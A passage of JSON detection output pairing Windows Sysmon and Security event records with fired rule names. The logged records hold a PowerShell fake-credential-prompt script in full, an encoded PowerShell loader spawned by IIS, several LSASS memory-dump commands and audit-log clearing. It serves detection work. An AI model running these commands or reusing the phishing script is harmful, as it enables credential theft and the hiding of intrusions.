(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AD19-5CB8-0000-0010F4F40C00","ProcessId":3980,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 17:00:09.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":24,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:00:09.977481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.311","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sysmon.evtx.lnk","UtcTime":"2019-04-18 17:03:03.311"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":32,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:03:03.321806Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.441","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HTools (vboxsrv) (D).lnk","UtcTime":"2019-04-18 17:03:03.441"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":33,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:03:03.441979Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PowerShell Credential Prompt"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"c7ca7056-b317-4fff-b796-05d8ef896dcd","ScriptBlockText":"function Invoke-LoginPrompt{\n$cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\")\n$username = \"$env:username\"\n$domain = \"$env:userdomain\"\n$full = \"$domain\" + \"\\\" + \"$username\"\n$password = $cred.GetNetworkCredential().password\nAdd-Type -assemblyname System.DirectoryServices.AccountManagement\n$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\nwhile($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){\n $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\")\n $username = \"$env:username\"\n $domain = \"$env:userdomain\"\n $full = \"$domain\" + \"\\\" + \"$username\"\n $password = $cred.GetNetworkCredential().password\n Add-Type -assemblyname System.DirectoryServices.AccountManagement\n $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\n $DS.ValidateCredentials(\"$full\", \"$password\") | out-null\n }\n $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password\n $output\n R{START_PROCESS}\n}\nInvoke-LoginPrompt"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"B5ABE6C2-675C-0001-A601-ACB55C67D501"},"EventID":4104,"EventRecordID":1123,"Execution_attributes":{"ProcessID":5500,"ThreadID":356},"Keywords":"0x0","Level":3,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2019-09-09T13:35:09.315230Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":4987,"Execution_attributes":{"ProcessID":824,"ThreadID":6060},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-04-27T19:27:55.274060Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"IEWIN7","SubjectLogonId":"0xffa8","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Encoded PowerShell Command Line","Shells Spawned by Web Servers"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\Temp\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B26B-5CEA-0000-002023240800","LogonId":"0x82423","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 -t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-3251-5CEB-0000-00109E06E100","ParentProcessId":748,"ProcessGuid":"365ABB72-3D4A-5CEB-0000-0010FA93FD00","ProcessId":2584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-27 01:28:42.700"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":5875,"Execution_attributes":{"ProcessID":324,"ThreadID":2260},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T01:28:42.711005Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","Procdump Usage"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 19:09:41.318","Image":"C:\\Users\\IEUser\\Desktop\\procdump.exe","ProcessGuid":"365ABB72-9B75-5C8E-0000-0010013F1200","ProcessId":1856,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.exe_190317_120941.dmp","UtcTime":"2019-03-17 19:09:41.318"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4433,"Execution_attributes":{"ProcessID":344,"ThreadID":2032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:09:41.328868Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 19:10:02.058","Image":"C:\\Windows\\system32\\taskmgr.exe","ProcessGuid":"365ABB72-9B85-5C8E-0000-0010C4CC1200","ProcessId":3576,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\lsass (2).DMP","UtcTime":"2019-03-17 19:10:02.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4441,"Execution_attributes":{"ProcessID":344,"ThreadID":2032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:10:03.991455Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WScript or CScript Dropper"],"event":{"Event":{"EventData":{"CommandLine":"cscript c:\\ProgramData\\memdump.vbs notepad.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Console Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC","Image":"C:\\Windows\\System32\\cscript.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1B6C-5D69-0000-00106F060F00","ParentProcessId":2128,"ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 12:54:07.823"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32151,"Execution_attributes":{"ProcessID":3292,"ThreadID":928},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:07.873789Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A","Image":"C:\\Windows\\System32\\cscript.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-08-30 12:54:08.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":32153,"Execution_attributes":{"ProcessID":3292,"ThreadID":4120},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:08.257123Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Process Dump via Comsvcs DLL"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 4868 C:\\Windows\\System32\\notepad.bin full","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-1C70-5D69-0000-0010D4551F00","ParentProcessId":1144,"ProcessGuid":"747F3D96-1C70-5D69-0000-0010C9661F00","ProcessId":2888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 12:54:08.331"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32154,"Execution_attributes":{"ProcessID":3292,"ThreadID":928},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:08.354049Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":887106,"Execution_attributes":{"ProcessID":8,"ThreadID":6640},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-07-22T20:29:27.321769Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x3a17a","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["LSASS Memory Dumping"],"event":{"Event":{"EventData":{"CommandLine":"PPLdump.exe -v lsass lsass.dmp","Company":"?","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"?","FileVersion":"?","Hashes":"SHA1=F1C0C54AA13037F46F55B721F7E2A2349A30DBCF,MD5=DBCA6A3860A106333FF6BE6306B2B186,SHA256=68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41,IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74","Image":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-EFC5-6081-0000-00203ACE0B00","LogonId":"0xbce3a","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F040-6081-0000-001046AC1B00","ParentProcessId":4864,"ProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ProcessId":6316,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-04-22 22:09:25.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564589,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:25.389633Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Processes Suspicious Parent Directory","LSASS Memory Dumping"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\services.exe 652 \"lsass.dmp\" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Desktop\\","Description":"Services and Controller app","FileVersion":"10.0.17763.1075 (WinBuild.160101.0800)","Hashes":"SHA1=617A0A0BAAB180541DB739C4A6851D784943C317,MD5=DB896369FB58241ADF28515E3765C514,SHA256=A2E369DF26C88015FE1F97C7542D6023B5B1E4830C25F94819507EE5BCB1DFCC,IMPHASH=7D2820FC8CAF521DC2058168B480D204","Image":"C:\\Windows\\System32\\services.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E19-6082-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"services.exe","ParentCommandLine":"PPLdump.exe -v lsass lsass.dmp","ParentImage":"C:\\Users\\IEUser\\Desktop\\PPLdump.exe","ParentProcessGuid":"747F3D96-F415-6081-0000-001040FE4900","ParentProcessId":6316,"ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2021-04-22 22:09:26.016"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":564593,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:26.081337Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","CreateMiniDump Hacktool"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-04-22 22:09:26.157","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-F416-6081-0000-001033034A00","ProcessId":7188,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.dmp","UtcTime":"2021-04-22 22:09:26.157"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":564596,"Execution_attributes":{"ProcessID":3352,"ThreadID":4696},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-04-22T22:09:26.163007Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6E1A-6082-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":624,"ProcessGuid":"747F3D96-F41F-6081-0000-001078834A00","ProcessId":6644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-22 